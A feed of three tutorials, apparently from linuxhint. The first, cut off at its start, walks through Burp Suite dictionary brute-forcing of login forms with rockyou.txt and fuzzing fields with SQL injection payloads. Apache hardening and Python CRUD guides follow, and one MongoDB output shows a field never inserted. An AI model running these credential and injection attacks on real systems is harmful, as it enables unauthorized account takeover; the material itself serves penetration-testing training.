In order to configure Chrome to work with a Burp, first, click on the Customize option on the top right corner of the window, then go to the Settings option. In the settings window, choose Advanced Settings, and then click on Change Proxy Settings from the given options.

For configuring Firefox to work with Burp

In order to configure Firefox to work with Burp, go to the Firefox menu in the top right corner of the window and open Preferences (Options on some versions). In the General tab, look for Network Proxy and click Settings. Choose Manual proxy configuration, enter the listener address, i.e., 127.0.0.1, and the Burp port, i.e., 8080. Delete everything in the "No Proxy for" field, and you are good to go.
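Once the proxy is configured, you can also confirm from the command line that Burp's listener is reachable; in the sketch below, example.com is just a placeholder, and -k skips the certificate warning caused by Burp's self-signed CA:

ubuntu@ubuntu:~$ curl -x http://127.0.0.1:8080 -k https://example.com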

Brute Force attack using Burp

Authentication is the process of making sure that the right person is accessing the service or the right person is logging in, using different techniques like access tokens, passwords, keys, etc. The use of passwords is highly common in everyday life. Here comes the importance of basic authentication hygiene, i.e., choosing a strong, complex password, because a login area protected with weak authentication can be accessed easily using automated attacks, such as brute-forcing and dictionary attacks.

Dictionary Attack is a brute force attack on a login field with the help of a dictionary. In this attack, hundreds of thousands of possible combinations of guessed passwords stored in a dictionary are tried on the login field, with the intention that one of them may work. These passwords are tried successively on the login field in order to bypass the authentication.

Let’s consider a scenario where we have to brute force a login page using a dictionary or a word list containing hundreds of thousands or millions of commonly leaked passwords.

Open Burp Suite and start intercepting the traffic by turning Intercept on. Switch to the browser, enter any username and password in the given fields, then click Login. Now switch to Burp; you will see that the traffic destined for the server has been intercepted midway and goes to Burp instead. Right-click the request and choose Send to Intruder from the given options.

Now, switch to the Intruder tab, where we will see multiple sub-tabs, i.e., Positions, Payloads, and Options. We have to configure the options in these tabs correctly to let Burp do its work and get our desired outcome.

Positions

Let's look at the Positions tab first. Here, we tell Burp which parameters in the request we want to attack, i.e., the password field, username field, etc.

By default, Burp highlights some fields in order to recommend to the user which fields can be attacked. But in our case, we just need to change the value of the username and password fields so that they are replaced with the next word in the dictionary on every request. For this, we need to first clear all the highlighted areas by clicking on the Clear button on the right side of the window. This will clear up Burp's recommended highlighted areas. Now, highlight the username and password fields, which are "NOTEXIST" in our case, and then click Add. We also need to specify the Attack type, which is Sniper by default, and change it to Cluster Bomb.

Payloads

Now, we have to set our payload through which we are going to attack these selected fields. Their values will be changed with each request according to the payload. Let’s set up a payload for parameter 1, i.e., Username field. Let’s add a small word list of usernames we have in a file. Click on Payload 1, and choose Payload type as Simple List. In Payload Option, click Load and go to your desired word list file, then select it. The selected word list values will be shown as given below.

Now, in setting up a payload for parameter 2, i.e., the Password field, let’s add a commonly used word list of leaked passwords, i.e., “rockyou.txt” since in our case, we have this in a file. Click on Payload 2 and choose Payload type as Simple List. In Payload Option, click Load and go to your desired word list file, then select it. The selected word list values will be shown as given below.

Options

After setting up the attack parameters and payload lists, it's time to configure the very important "Options" tab. In the Options tab, rules are set that tell us which request is successful; in our case, this means which password worked. We have to configure one thing here: the string or message that is displayed when the right password is found, e.g., Welcome, Welcome to our portal, Good to be back, etc. It depends on the web application developer. We can check it by entering correct credentials in the login area.

We have “Welcome to password protected area admin” here. Now, switch to Burp in the Options tab, find Grep Match, and write the following string here. Check the Simple String option, and we are good to go.

Everything is set up nicely. Now, all we have to do is to start the attack. Go to the Intruder tab, and then click Start Attack. An intruder will now try all combinations possible from the provided payloads.

We can see Intruder trying all combinations, as in the image given above. We can see whether a request is successful or not by looking at the length of the responses: a successful request has a different length than an unsuccessful one. Another way of knowing whether the request is successful is the "Welcome to password protected area" column (i.e., the string we provided in the Options tab earlier). If the small box is ticked, the request was successful, and vice versa. In our case, the successful request has length 4963, while it is 4902 in the case of an unsuccessful one.

A brute force attack using Burp, with the help of a powerful dictionary, is a very effective and underrated method of bypassing login pages that are not hardened against automated guessing. In the case of a weak, reused, common, or short password, this is a very effective technique.

Fuzzing

Fuzzing is an approach used for automating the process of discovering bugs, weaknesses, or vulnerabilities by sending a large number of requests to an application with various payloads, with the expectation that the web application might trigger unexpected behavior. It isn't specific to web applications and can also be used to find other flaws, such as buffer overflows. The vast majority of common web vulnerabilities can be found through fuzzing, such as XSS (cross-site scripting), SQL injection, LFI, RFI, etc. Burp is really powerful, and it is also the best tool available for getting the job done smoothly.

Fuzzing with Burp

Let's take a web application vulnerable to SQL injection and fuzz it with Burp to find potentially vulnerable fields.

Fire up Burp and start intercepting the login request. We will see a bunch of data; right-click and choose the Send to Intruder option from the given menu. Go to the Positions tab and configure the right parameters. By default, Burp highlights some fields in order to recommend to the user which fields can be attacked. But in our case, we just need to change the value of the username and password fields. First, clear all the highlighted areas by clicking on the Clear button on the right side of the window. This will clear Burp's recommended highlighted areas. Now, just highlight the username and password fields, and then click Add. We also need to specify the Attack type and set it to Sniper.

Now, go to the Payloads tab and, here, we have to set our payload through which we are going to attack these selected fields. Their values will be changed with each request according to the payload. Let’s set up a payload for parameter 1 and parameter 2, i.e., Username and Password fields, respectively. Burp also has a wide range of its payloads for different types of vulnerabilities. We can use them or create or load one of our own in Burp’s easy to use interface. In this case, we are going to load Burp’s payload that will trigger an alert in case of finding a SQL vulnerability.

Select Simple List in the Payload type option. Now, click on the Load option in the "Payload Options" window. Here, select the Fuzzing-SQL injection payload from the available options. Payload sets determine which list is used for a specified parameter. If you pick two attack vectors (parameters), you can set a different word list for each one. Likewise, you can set payload processing options such as case alteration, numbers, dates, and so on. For this situation, the Simple List type is all we need, since we are using Burp's default payload.

Now, go to the Options tab, where you can see some very interesting options. For example, the "Grep" option can be selected to match responses against given keywords, such as "SQL". Another cool option is the "Timeout" option, which comes in very handy when a web application firewall may be present. In our case, we checked the "Follow redirections" option since we have a redirect parameter in the request. However, once in a while, an error can also be triggered before the redirection, and both cases can then be tested separately.

Now, everything is set up nicely, and Burp Intruder is ready to start the attack. Click on the Start attack option and wait; an attack that would literally take hours to complete manually finishes in just a minute or two. Once the attack is completed, all we have to do is analyze the results closely. We should look for a different or odd value in the length column, and for any anomalies in the status code, as these indicate which requests caused an error.

On getting an odd status code or length value, one has to check the response window. In our case, we can see that the 4th request has a different status code and a higher length value than usual, and upon looking at the response area, we can see that Burp can bypass the login area using a value from the payload. The attack can be considered successful.

This is a very effective technique in bug bounty and pen testing procedures, as it investigates every parameter present in the site and attempts to understand what each one does, whether it is connected to the database, or whether it is reflected in the response page, among other things. This technique, however, causes a lot of noise on the server side and can even lead to denial of service, which is frustrating for web application users and developers as well as for attackers.

Burp Extensions

With the help of Burp Extender, numerous useful Burp extensions can be added to enhance the capabilities of Burp. One can write one's own third-party code or load existing extensions. For loading and installing extensions into Burp, the BApp Store is the place to go. Burp extensions have various uses, such as modifying HTTP requests and responses, customizing the user interface, adding scanner and runtime checks, etc.

BApp Store

The BApp Store consists of Burp extensions that have been written by users of Burp Suite to enhance Burp's abilities and features. You can see the list of available BApps, install specific BApps, and submit user ratings for those you have installed.

Burp extensions can also be downloaded from the BApp Store's website and added to Burp later on. Different BApps are written in different languages, such as Python or Ruby, and expect the user to download Jython or JRuby for them to work properly; you then configure Burp with the directory of the relevant language interpreter. In some cases, a BApp may require a later or specific version of Burp. Let's look at some of Burp's many useful extensions:

Autorize:

Autorize is a very effective extension when there is a need to detect authorization vulnerabilities in a web application automatically. Detecting authorization vulnerabilities is a very time-consuming task for any bug bounty hunter or pentester. In the manual method, you need to remove the cookies from each request every time to check whether authorization has been enforced or not. Autorize does this job automatically: you supply the cookies of a low-privileged user of the web application and then navigate the application as a more privileged user. Autorize repeats each request with the low-privileged user's session and thereby detects authorization vulnerabilities or flaws.

It is likewise possible to repeat each request with no cookies at all, to detect authentication flaws as well as authorization vulnerabilities. This extension works without any prior configuration but is at the same time highly adaptable, allowing you to configure the granularity of the authorization-enforcement conditions and which requests the extension must test.

On completing the procedure, there will be red, green, and yellow colors on the screen, showing the "Bypassed", "Enforced", and "Is Enforced??" statuses, respectively.

Turbo Intruder

Turbo Intruder is a modified version of Burp Intruder and is used when extreme complexity and speed are needed for handling HTTP requests. Turbo Intruder is fast because it uses an HTTP stack hand-coded from scratch, with speed as the priority. This makes it extremely fast and sometimes even a better option than well-written Go scripts. Its scalable nature is another highlight, due to its ability to achieve flat memory usage. Turbo Intruder can also run in a command-line environment. An advanced diffing algorithm is built into this awesome extension, which automatically filters out boring and useless output.

One of the main attacks for which Turbo Intruder can be used is the race condition attack. A race condition occurs when a system designed to perform tasks in a specific sequence is forced to perform more than one task at a time. In that kind of scenario, Turbo Intruder is used because it can send multiple requests with enormous speed. This type of attack exploits a race condition vulnerability and can enable abuse such as redeeming the same gift card multiple times, abusing like/unlike features, etc.

To send an HTTP request to Turbo Intruder, intercept the request, right-click in the window, and select the Send to Turbo Intruder option from the given list. Turbo Intruder is a bit harder to use than Burp's default Intruder.

Conclusion:

Burp is an extremely powerful, feature-rich tool, one of whose awesome features is the ability to automate attacks and find vulnerabilities, which makes life much easier for a pentester or bug bounty hunter. Tasks that can take days manually can be done in very little time using Burp, and it also provides an easy graphical user interface for launching brute force attacks, with or without a dictionary, by building a word list right at the moment. On the other hand, the BApp Store provides extremely powerful extensions that further enhance the capabilities of Burp Suite. ]]> How to Secure Your Apache Server https://linuxhint.com/secure_apache_server/ Fri, 06 Nov 2020 03:14:35 +0000 https://linuxhint.com/?p=75701 Apache is a popular, open-source web server available for both Linux and Windows systems. It allows configuration for a diverse range of use cases, from HTML webpages to HyperText Preprocessor (PHP) dynamic web application content. Apache provides a secure and robust platform to deploy your web applications. However, it is still important to install the latest security patches and configure the server properly to establish a secure environment for your web applications.
In this article, you will find some tips and tricks to strengthen your Apache Web Server configurations and improve the general security.

Non-Privileged User Account

The purpose of a non-root or unprivileged user account is to restrict the user from unnecessary access to certain tasks within a system. In the context of an Apache web server, this means that it should work in a restricted environment with only the necessary permissions. By default, Apache runs with daemon account privileges. You can create a separate non-root user account to avoid threats in case of security vulnerabilities.

Furthermore, if apache2 and MySQL run under the same user credentials, any issue in the process of one service will have an impact on the other. To change the user and group privileges for the web server, go to /etc/apache2, open the file envvars, set the user and group to a new non-privileged account user, say, "apache," and save the file.

ubuntu@ubuntu~:$ sudo vim /etc/apache2/envvars
...snip...
export APACHE_RUN_USER=apache
export APACHE_RUN_GROUP=apache
...snip...

You can also use the following command to change the ownership of the installation directory to the new non-root user.

ubuntu@ubuntu~:$ sudo chown -R apache:apache /etc/apache2

Then restart Apache to apply the changes:

ubuntu@ubuntu~:$ sudo service apache2 restart

Keep Apache Up to Date

Apache is famous for providing a secure platform with a highly concerned developer community that rarely faces any security bugs. Nevertheless, it is normal to discover issues once the software is released. Hence, it is essential to keep the web server up to date to avail the latest security features. It is also advised to follow the Apache Server Announcement Lists to keep yourself updated about new announcements, releases, and security updates from the Apache development community.

To update your apache using apt, type the following:

ubuntu@ubuntu~:$ sudo apt-get update
ubuntu@ubuntu~:$ sudo apt-get upgrade

Disable Server Signature

The default configuration of an Apache Server exposes a lot of details about the server and its settings. For example, the ServerSignature and ServerTokens directives in the /etc/apache2/apache2.conf file expose potentially sensitive information in the Server response header and on server-generated pages. This information includes server details, such as the server version and hosting OS, that can help the attacker with the reconnaissance process. You can restrict these directives by editing the apache2.conf file via vim/nano and adding the following directives:

ubuntu@ubuntu~:$ sudo vim /etc/apache2/apache2.conf
...snip...
ServerSignature Off
...snip...
ServerTokens Prod
...snip...

Restart Apache to update the changes.

Disable Server Directory Listings

The Directory listings display all content saved in the root folder or sub-directories. The directory files can include sensitive information not intended for public display, such as PHP scripts, configuration files, files containing passwords, logs, etc.
To disallow directory listings, change the Apache server configuration file by editing the apache2.conf file as:

ubuntu@ubuntu~:$ sudo vim /etc/apache2/apache2.conf

...snip...

<Directory /var/www>

Options -Indexes

</Directory>

...snip...

OR

...snip...

<Directory /var/www/your_website>

Options -Indexes

</Directory>

...snip...

You can also add this directive in the .htaccess file of your main website directory.

Protect System Settings

The .htaccess file is a convenient and powerful feature that allows configuration outside the main apache2.conf file. However, in cases where a user can upload files to the server, this can be exploited by an attacker to upload his or her own “.htaccess” file with malicious configurations. So, if you are not using this feature, you can disable the .htaccess directive, i.e.:

ubuntu@ubuntu~:$ sudo vim /etc/apache2/apache2.conf
...snip...
#AccessFileName .htaccess
...snip...

OR
Alternatively, disable .htaccess files except in specifically enabled directories by editing the apache2.conf file and setting the AllowOverride directive to None:

ubuntu@ubuntu~:$ sudo vim /etc/apache2/apache2.conf

...snip...

<Directory '/'>

AllowOverride None

</Directory>

...snip...

Secure Directories with Authentication

You can create user credentials to protect all or some of the directories using the htpasswd utility. Go to your server folder and use the following command to create a .htpasswd file to store password hashes for the credentials assigned to, say, a user named dev.

ubuntu@ubuntu~:$ sudo htpasswd -c /etc/apache2/.htpasswd dev

The above command will ask for the new password and a password confirmation. You can cat the .htpasswd file to check the hash stored for the user credentials.

Now, you can protect the your_website directory by modifying its .htaccess file. Use the following command and directives to enable authentication:

ubuntu@ubuntu~:$ sudo nano /var/www/your_website/.htaccess
...snip...
AuthType Basic
AuthName "Add the Dialog Prompt"
AuthUserFile /etc/apache2/user_name/domain_name/.htpasswd
Require valid-user
...snip...

Remember to add the path as per yours.

Run Necessary Modules

The default Apache configuration includes enabled modules that you may not even need. These pre-installed modules open doors for Apache security issues that either already exist or can exist in the future. To disable all these modules, you first need to understand which modules are required for the smooth functioning of your web server. For this purpose, check out the apache module documentation that covers all available modules.

Next, use the following command to figure out which modules are running on your server.

ubuntu@ubuntu~:$ sudo ls /etc/apache2/mods-enabled

Apache comes with the powerful a2dismod command for disabling modules. It prevents the module from being loaded and, when you disable a module, prompts you with a warning that the action can negatively impact your server.

ubuntu@ubuntu~:$ sudo a2dismod module_name

You can also disable a module by commenting out its LoadModule line in the configuration.
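For example, if you have confirmed that the server-status module is not needed on your setup, it could be disabled and Apache restarted as follows (only do this after verifying that nothing depends on the module):

ubuntu@ubuntu~:$ sudo a2dismod status
ubuntu@ubuntu~:$ sudo service apache2 restart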

Prevent Slow Loris and DoS Attack

The default installation of an Apache server forces it to wait for requests from clients for too long, which subjects the server to Slow Loris and DoS attacks. The apache2.conf configuration file provides a directive that you can use to lower the timeout value to a few seconds to prevent these types of attacks, i.e.:

ubuntu@ubuntu~:$ sudo vim /etc/apache2/apache2.conf
Timeout 60

Besides, the new Apache server comes with a handy module, mod_reqtimeout, that provides a directive, RequestReadTimeout, to secure the server from illegitimate requests. This directive comes with a few tricky configurations, so you can read the related information on the documentation page.
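As a starting point, the configuration below, based on the commonly cited defaults from the mod_reqtimeout documentation, gives clients 20 to 40 seconds to send the request headers and 20 seconds to start sending the body, extending the limits only while data keeps arriving at a minimum rate of 500 bytes per second; tune the values to your own traffic:

ubuntu@ubuntu~:$ sudo vim /etc/apache2/apache2.conf
...snip...
RequestReadTimeout header=20-40,MinRate=500 body=20,MinRate=500
...snip...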

Disable Unnecessary HTTP Requests

Unlimited HTTP/HTTPS request sizes can also lead to low server performance or a DoS attack. You can limit the allowed size of the HTTP request body per directory by using the LimitRequestBody directive, setting it to any limit you choose (the example below uses roughly 1 MB). For instance, to create a directive for the folder /var/www/your_website, you can add the LimitRequestBody directive below AllowOverride All, i.e.:

...snip...

<Directory /var/www/your_website>

Options -Indexes

AllowOverride All

LimitRequestBody 995367

</Directory>

...snip...

Note: Remember to restart Apache after the applied changes to update it accordingly.

Conclusion

The default installation of the Apache server can supply plenty of sensitive information to aid attackers in an attack. In the meantime, there are plenty of other ways (not listed above) to secure the Apache web server, as well. Continue researching and keeping yourself updated about new directives and modules to secure your server further.

]]>
CRUD Operations to SQL and NoSQL Databases using Python https://linuxhint.com/crud_operations_python/ Sun, 01 Nov 2020 06:52:53 +0000 https://linuxhint.com/?p=74895 There are two major types of databases that can be used with an application: relational databases (SQL) and non-relational databases (NoSQL). Both are widely used but selecting one depends on the type of data that will be stored. There are four basic operations that can be performed on databases: create, read, update and delete (CRUD).

We can interact with databases using any programming language, or we can use a software program that allows us to interact with the database through a GUI. In this article, we will discuss databases and show you how to interact with them using the Python programming language.

Relational Databases (SQL)

Relational databases (SQL) are different from non-relational databases (NoSQL) in terms of schema. A schema is a template that defines the structure of the data you are going to store. In relational databases, we create tables to store data. The schema of a table is defined when the table is created. For example, if we want to store data on students in a relational database, then we will create a table of students and define the schema of the table, which might include the name, registration number, grade, etc. of each student. After creating the schema, we will store the data in the rows of the table. It is important to note that we cannot store data that is not defined in the schema. In this example, the grade a student received on an exam cannot be stored in the table because we have not defined a column for these data in the schema.

The following list includes some popular relational databases:

  • MariaDB
  • MySQL
  • SQL Server
  • PostgreSQL
  • Oracle

Non-Relational Databases (NoSQL)

As discussed above, non-relational databases do not have a defined schema. Non-relational databases have collections instead of tables, and these collections contain documents that are equivalent to the rows in a relational database. For example, if we want to create a non-relational database to store student data, we can create a collection of students and, in this collection, store a document for each student. These documents do not have a defined schema, and you can store anything you want for each student.

Performing CRUD Operations in MySQL

Now, we will show you how to interact with MySQL using Python.

Installing MySQL Driver for Python

To interact with MySQL using Python, we first need to install MySQL driver in Python.

ubuntu@ubuntu:~$ sudo pip3 install mysql-connector-python

or

ubuntu@ubuntu:~$ sudo pip install mysql-connector-python

Creating a Database

Before creating a database, we need to connect with MySQL server using Python. The mysql.connector module offers the connect() method to help to establish a connection with MySQL using Python.

>>> import mysql.connector
//Replace with your own IP and Server Credentials
>>> sql = mysql.connector.connect(
... host='localhost',
... user='root',
... password='12345'
... )
>>> print(sql)
<mysql.connector.connection_cext.CMySQLConnection object at 0x7fccb1190a58>

This message shows that we have successfully created a connection with a MySQL database using Python. Now, we will run an SQL query on MySQL server using the execute() method from the mysql.connector module.

>>> cursor = sql.cursor()
>>> query = 'CREATE DATABASE demo_db'
>>> cursor.execute(query)

The above code will create a database named demo_db in MySQL.

Creating a Table

Now that we have created a database, we will create a new table named students. To create a table, we need to connect to the database.

>>> sql_db = mysql.connector.connect(
... host='localhost',
... user='root',
... password='12345',
... database='demo_db'
... )

After connecting to the database, we will use the execute() method to run an SQL query to create a table with a schema.

>>> query = "CREATE TABLE students(name VARCHAR(64), id INT, grade INT, dob DATE)";
>>> cursor.execute(query);

The above command will create a table named students in the demo_db database; we can insert only a name, id, grade, and date of birth into the table, as defined in the schema.

Inserting Rows into a Table

Now that we have created a table, we will insert a student in this table. We will create a query and then use the execute() method to run the query on MySQL server using Python.

>>> query = 'INSERT INTO students(name, id, grade, dob) VALUES("John", 1, 3, "2020-7-04")'
>>> cursor.execute(query)
>>> sql_db.commit()

This query will add a student with the data defined in the query into the table. We can add additional students to the table in the same way.

NOTE: Changes will be applied to the database only if you run sql_db.commit() after applying changes.
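Instead of building SQL strings by hand for every row, mysql-connector also accepts parameterized queries, and the executemany() method can insert several rows at once. A small sketch follows; the extra student names and values are illustrative only:

>>> query = 'INSERT INTO students(name, id, grade, dob) VALUES(%s, %s, %s, %s)'
>>> values = [
...     ('Sara', 2, 3, '2020-7-10'),
...     ('John', 3, 3, '2020-7-08'),
...     ('Alex', 4, 4, '2020-7-15')
... ]
>>> cursor.executemany(query, values)
>>> sql_db.commit()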

Selecting Rows from a Table

The SELECT statement in MySQL is used to return data from a table. We will use the execute() method to run a query, and then we will use the fetchall() method to get a list of all students. Then, we can use a for loop to display all the students.

>>> query = 'SELECT * FROM students'
>>> cursor.execute(query)
>>> result = cursor.fetchall()
>>> for x in result:
...     print(x)
('John', 1, 3, datetime.date(2020, 7, 4))

We can see that only data for a single student are returned, as we have only one student in the table. We can use the WHERE statement in MySQL with the SELECT statement to specify constraints. For example, if we want to return the students in grade 4 only, we can use the following query:

>>> query = 'SELECT * FROM students WHERE grade = 4'
>>> cursor.execute(query)
>>> result = cursor.fetchall()
>>> for x in result:
...    print(x)

The above code will fetch only the students from grade 4.

Updating a Row

In this section, we will show you how to update the student data in a MySQL table using Python. We will use the UPDATE statement with the WHERE and SET statements in MySQL to update the data of specific students. The WHERE statement is used to determine which rows will be updated, and the SET statement is used to define the values used for the update.

>>> query = 'UPDATE students SET name="Mark" WHERE id = 4'
>>> cursor.execute(query)
>>> sql_db.commit()

Now, we will try to read the student data from the table by using the SELECT statement.

>>> query = 'SELECT * FROM students WHERE id=4'
>>> cursor.execute(query)
>>> for x in cursor:
...     print(x)
('Mark', 4, 4, datetime.date(2020, 7, 15))

Now, we can see that the name of the student with id 4 has been changed to Mark.

Deleting a Row

We can delete a row from the table by applying the DELETE statement in MySQL using Python. We will use a DELETE statement with a WHERE statement to delete specific students from the table.

>>> query = 'DELETE FROM students WHERE id=2'
>>> cursor.execute(query)
>>> sql_db.commit()

Now, we can return all the students from the table using the SELECT statement.

>>> query = 'SELECT * FROM students'
>>> cursor.execute(query)
>>> for x in cursor:
...     print(x)
('John', 1, 3, datetime.date(2020, 7, 4))
('John', 3, 3, datetime.date(2020, 7, 8))
('Mark', 4, 4, datetime.date(2020, 7, 15))

We can see that the table does not contain a student with an id of 2, as we have removed the student from the table.

Dropping a Table

The mysql.connector module can also be used to drop a table. We can execute a DROP statement in MySQL by using the execute() method.

>>> cursor = sql_db.cursor()
>>> query = 'DROP TABLE students'
>>> cursor.execute(query)

The above code will delete the table named students when executed in Python.

That concludes our discussion of SQL databases. We have shown you how to apply different queries to a MySQL database using Python. Next, we will apply CRUD operations to a NoSQL database called MongoDB.

Performing CRUD Operations in MongoDB

To interact with MongoDB using Python, we must first install pymongo, which is a MongoDB driver for Python.

ubuntu@ubuntu:~$ sudo pip install pymongo

or

ubuntu@ubuntu:~$ sudo pip3 install pymongo

Creating a Database

We can connect to MongoDB using the MongoClient() method of the pymongo module. Before performing any actions, we need to connect to the MongoDB server.

>>> import pymongo
>>> client = pymongo.MongoClient('mongodb://localhost:27017/')

After connecting to the database server, we can execute the following line to create a new database named demo_db.

>>> db = client['demo_db']

If the database already exists, then this command is ignored.

Creating a Collection

Now that we have created a database, we will create a collection named students in the demo_db database.

>>> import pymongo
>>> client = pymongo.MongoClient('mongodb://localhost:27017/')
>>> db = client['demo_db']
>>> col = db['students']

NOTE: MongoDB does not create a collection until you enter data in it. Therefore, if you try to access the collection after running the above code, you will find that there is nothing in the database.

Unlike MySQL, we do not have to define a schema when creating a new collection, as MongoDB is a non-relational database.

Inserting a Document

After creating a collection, we can insert a document inside the collection. First, we must define a dictionary, and then we can use the insert_one() method to insert the data defined in the dictionary into the collection.

NOTE: MongoDB automatically creates a unique ‘_id’ for each document; therefore, we do not need to specify an id.

>>> data = {
... "name": "John",
... "grade": 3,
... "dob": "2020-04-03"
... }
>>> result = col.insert_one(data)

In the above document, we inserted name, grade and dob. Now, we will insert a document in the students collection that has a field for age.

>>> data = {
... "name" : "Mark",
... "grade": 4,
... "dob": "2020-04-09",
... "age" : 8
... }
>>> result = col.insert_one(data)

We can see that this command does not throw an error. Because MongoDB is a non-relational database, we can add any information we want in the document.
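pymongo also provides an insert_many() method for adding several documents in a single call; a minimal sketch with illustrative values is shown below:

>>> data = [
...     {"name": "Alice", "grade": 2, "dob": "2020-03-01"},
...     {"name": "Bob", "grade": 5, "dob": "2020-05-20", "age": 9}
... ]
>>> result = col.insert_many(data)
>>> print(result.inserted_ids)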

Getting Documents

In this section, we will use the find() and find_one() methods to get data from the database. The find() method takes two arguments: the first is used to filter documents, and the second is used to define the fields of the document we want to return. For example, if we want to get the id of ‘John,’ then we can run the following query:

>>> result = col.find({"name": "John"}, {"_id": 1})
>>> for x in result:
...     print(x)
{'_id': ObjectId('5f8f0514cb12c01f7420656e')}

Alternatively, we can get all the documents from the collection by using the following query:

>>> result = col.find()
>>> for x in result:
...     print(x)
{'_id': ObjectId('5f8f0514cb12c01f7420656e'), 'name': 'John', 'grade': 3, 'dob': '2020-04-03'}
{'_id': ObjectId('5f8f061ccb12c01f7420656f'), 'name': 'Mark', 'grade': 4, 'dob': '2020-04-09', 'age': 8}
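The filter argument of find() also accepts MongoDB query operators. For example, the following sketch returns only the students whose grade is greater than 3:

>>> result = col.find({"grade": {"$gt": 3}})
>>> for x in result:
...     print(x)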

Updating Documents

The pymongo module offers the update_one() and update_many() methods for updating the documents in a collection. Both methods take two arguments: the first defines which document to change, and the second defines the new values. Now, we will change the grade of the student ‘Mark’.

>>> query = {"name": "Mark"}
>>> value = {"$set": {"grade": 5}}
>>> col.update_one(query, value)

>>> for x in col.find():
...     print(x)
{'_id': ObjectId('5f8f0514cb12c01f7420656e'), 'name': 'John', 'grade': 3, 'dob': '2020-04-03'}
{'_id': ObjectId('5f8f061ccb12c01f7420656f'), 'name': 'Mark', 'grade': 5, 'dob': '2020-04-09', 'age': 8}

Deleting a Document

The pymongo module in Python has two methods, i.e., delete_one() and delete_many(), for deleting documents. Both methods take an argument that selects the document to delete. With the following code, we will delete a student named ‘John’.

>>> query = {"name": "John"}
>>> col.delete_one(query)

>>> for x in col.find():
...     print(x)
{'_id': ObjectId('5f8f061ccb12c01f7420656f'), 'name': 'Mark', 'id': 2, 'grade': 5, 'dob': '2020-04-09', 'age': 8}

Dropping a Collection

We can drop a collection in MongoDB by using the drop() method of the pymongo module in Python. First, we need to connect to the database server; then, we select the database that holds the collection we want to remove. After selecting the collection from the database, we can remove it using the drop() method. The following code will drop the students collection.

>>> import pymongo
>>> client = pymongo.MongoClient('mongodb://localhost:27017/')
>>> db = client['demo_db']
>>> col = db['students']
>>> col.drop()

Conclusion

Knowledge of databases is essential if you want to make a web application. Almost every programming language has frameworks and libraries for backend web development. Python can be used in backend web development, and so we can interact with databases using Python while working with Python backend frameworks. In this article, we showed you how to interact with MongoDB and MySQL databases by using simple CRUD operations written in Python.

]]>